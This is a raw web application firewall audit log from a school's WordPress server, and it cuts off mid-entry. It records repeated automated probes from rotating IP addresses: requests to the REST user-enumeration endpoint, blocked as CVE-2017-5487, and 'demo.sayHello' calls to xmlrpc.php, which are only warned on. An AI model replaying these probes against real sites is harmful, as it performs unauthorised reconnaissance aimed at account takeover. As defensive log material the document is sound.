103.236.140.4 55276 103.236.140.4 8181 --76d37a40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.66 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --76d37a40-C-- demo.sayHello --76d37a40-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --76d37a40-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427541884032 6042 (- - -) Stopwatch2: 1747427541884032 6042; combined=4403, p1=567, p2=3617, p3=30, p4=37, p5=91, sr=79, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76d37a40-Z-- --58f0e33d-A-- [17/May/2025:03:32:39 +0700] aCeg53yxdQCiyU1ENFchTQAAABc 103.236.140.4 55280 103.236.140.4 8181 --58f0e33d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --58f0e33d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58f0e33d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427559702489 3301 (- - -) Stopwatch2: 1747427559702489 3301; combined=1333, p1=474, p2=831, p3=0, p4=0, p5=28, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58f0e33d-Z-- --5b76a031-A-- [17/May/2025:03:32:39 +0700] aCeg5wTOsBn9MSWb6WJpuwAAAIw 103.236.140.4 55282 103.236.140.4 8181 --5b76a031-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5b76a031-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b76a031-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427559702785 3190 (- - -) Stopwatch2: 1747427559702785 3190; combined=1279, p1=414, p2=837, p3=0, p4=0, p5=27, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b76a031-Z-- --b33f8b1d-A-- [17/May/2025:03:32:45 +0700] aCeg7XyxdQCiyU1ENFchUAAAAAI 103.236.140.4 55288 103.236.140.4 8181 --b33f8b1d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.151 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b33f8b1d-C-- demo.sayHello --b33f8b1d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b33f8b1d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427565124352 5275 (- - -) Stopwatch2: 1747427565124352 5275; combined=3995, p1=495, p2=3119, p3=25, p4=23, p5=179, sr=78, sw=154, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b33f8b1d-Z-- --fbb6b75a-A-- [17/May/2025:03:32:45 +0700] aCeg7XyxdQCiyU1ENFchUQAAAAM 103.236.140.4 55290 103.236.140.4 8181 --fbb6b75a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fbb6b75a-C-- demo.sayHello --fbb6b75a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbb6b75a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427565135006 4847 (- - -) Stopwatch2: 1747427565135006 4847; combined=3834, p1=488, p2=3146, p3=23, p4=25, p5=89, sr=95, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbb6b75a-Z-- --dc31834b-A-- [17/May/2025:03:32:51 +0700] aCeg8wTOsBn9MSWb6WJpvQAAAI4 103.236.140.4 55296 103.236.140.4 8181 --dc31834b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dc31834b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc31834b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427571197409 2747 (- - -) Stopwatch2: 1747427571197409 2747; combined=1166, p1=398, p2=735, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc31834b-Z-- --89449104-A-- [17/May/2025:03:32:57 +0700] aCeg-QTOsBn9MSWb6WJpvwAAAJA 103.236.140.4 55300 103.236.140.4 8181 --89449104-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.240 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --89449104-C-- demo.sayHello --89449104-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --89449104-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427577074668 6582 (- - -) Stopwatch2: 1747427577074668 6582; combined=4552, p1=647, p2=3658, p3=31, p4=34, p5=105, sr=89, sw=77, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89449104-Z-- --e990db5d-A-- [17/May/2025:03:33:39 +0700] aCehI3yxdQCiyU1ENFchUwAAAAY 103.236.140.4 55304 103.236.140.4 8181 --e990db5d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e990db5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e990db5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427619370370 3024 (- - -) Stopwatch2: 1747427619370370 3024; combined=1274, p1=427, p2=818, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e990db5d-Z-- --a4727766-A-- [17/May/2025:03:33:45 +0700] aCehKXyxdQCiyU1ENFchVQAAAAk 103.236.140.4 55308 103.236.140.4 8181 --a4727766-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.98 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a4727766-C-- demo.sayHello --a4727766-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4727766-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427625569279 5820 (- - -) Stopwatch2: 1747427625569279 5820; combined=4272, p1=488, p2=3521, p3=30, p4=31, p5=115, sr=71, sw=87, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4727766-Z-- --bbe19b08-A-- [17/May/2025:03:34:46 +0700] aCehZgTOsBn9MSWb6WJpwwAAAJc 103.236.140.4 55318 103.236.140.4 8181 --bbe19b08-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bbe19b08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbe19b08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427686937011 3408 (- - -) Stopwatch2: 1747427686937011 3408; combined=1360, p1=488, p2=842, p3=0, p4=0, p5=30, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbe19b08-Z-- --1e9b236c-A-- [17/May/2025:03:34:53 +0700] aCehbHyxdQCiyU1ENFchVwAAAAw 103.236.140.4 55322 103.236.140.4 8181 --1e9b236c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.10 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1e9b236c-C-- demo.sayHello --1e9b236c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e9b236c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427692997453 7086 (- - -) Stopwatch2: 1747427692997453 7086; combined=5123, p1=714, p2=4119, p3=41, p4=43, p5=119, sr=130, sw=87, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e9b236c-Z-- --3a557016-A-- [17/May/2025:03:34:53 +0700] aCehbXyxdQCiyU1ENFchWAAAAA0 103.236.140.4 55324 103.236.140.4 8181 --3a557016-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3a557016-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a557016-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427693455124 3001 (- - -) Stopwatch2: 1747427693455124 3001; combined=1257, p1=444, p2=785, p3=0, p4=0, p5=28, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a557016-Z-- --7a28ac05-A-- [17/May/2025:03:35:00 +0700] aCehdATOsBn9MSWb6WJpxQAAAIE 103.236.140.4 55328 103.236.140.4 8181 --7a28ac05-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.243 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7a28ac05-C-- demo.sayHello --7a28ac05-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a28ac05-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427700363948 3222 (- - -) Stopwatch2: 1747427700363948 3222; combined=2478, p1=321, p2=2011, p3=19, p4=16, p5=64, sr=46, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a28ac05-Z-- --863a5b5f-A-- [17/May/2025:03:35:11 +0700] aCehfwTOsBn9MSWb6WJpxgAAAIA 103.236.140.4 55334 103.236.140.4 8181 --863a5b5f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.32 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --863a5b5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --863a5b5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427711660454 3011 (- - -) Stopwatch2: 1747427711660454 3011; combined=1308, p1=445, p2=833, p3=0, p4=0, p5=30, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --863a5b5f-Z-- --4b5e8b0f-A-- [17/May/2025:03:35:19 +0700] aCehhgTOsBn9MSWb6WJpyAAAAIQ 103.236.140.4 55342 103.236.140.4 8181 --4b5e8b0f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.32 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4b5e8b0f-C-- demo.sayHello --4b5e8b0f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b5e8b0f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427718999158 6132 (- - -) Stopwatch2: 1747427718999158 6132; combined=4318, p1=602, p2=3557, p3=22, p4=24, p5=66, sr=87, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b5e8b0f-Z-- --bcfa8b4d-A-- [17/May/2025:03:35:57 +0700] aCehrXyxdQCiyU1ENFchXQAAABc 103.236.140.4 55348 103.236.140.4 8181 --bcfa8b4d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bcfa8b4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcfa8b4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427757180344 14894 (- - -) Stopwatch2: 1747427757180344 14894; combined=26052, p1=338, p2=694, p3=0, p4=0, p5=12523, sr=68, sw=0, l=0, gc=12497 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcfa8b4d-Z-- --1ad36606-A-- [17/May/2025:03:36:03 +0700] aCehs3yxdQCiyU1ENFchXwAAAAA 103.236.140.4 55352 103.236.140.4 8181 --1ad36606-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.251 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1ad36606-C-- demo.sayHello --1ad36606-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ad36606-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427763523367 6466 (- - -) Stopwatch2: 1747427763523367 6466; 